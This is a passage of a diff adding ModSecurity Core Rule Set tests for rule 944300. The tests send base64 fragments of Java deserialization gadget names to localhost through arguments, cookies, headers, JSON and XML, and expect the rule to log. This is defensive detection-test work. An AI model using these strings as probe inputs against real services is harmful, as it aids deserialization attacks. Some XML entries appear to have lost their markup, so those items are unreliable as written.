Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-76 + desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-77 + desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-78 + desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-79 + desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-80 + desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-81 + desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-82 + desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-83 + desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-84 + desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-85 + desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-86 + desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-87 + desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-88 + desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-89 + desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-90 + desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-91 + desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-92 + desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-93 + desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-94 + desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-95 + desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-96 + desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-97 + desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-98 + desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-99 + desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-100 + desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-101 + desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-102 + desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-103 + desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-104 + desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-105 + desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-106 + desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-107 + desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-108 + desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-109 + desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-110 + desc: "Argument test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-111 + desc: "Argument name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-112 + desc: "Cookie test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-113 + desc: "Cookie name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-114 + desc: "Request header test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-115 + desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-116 + desc: "XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-117 + desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-118 + desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-119 + desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" + stages: + - 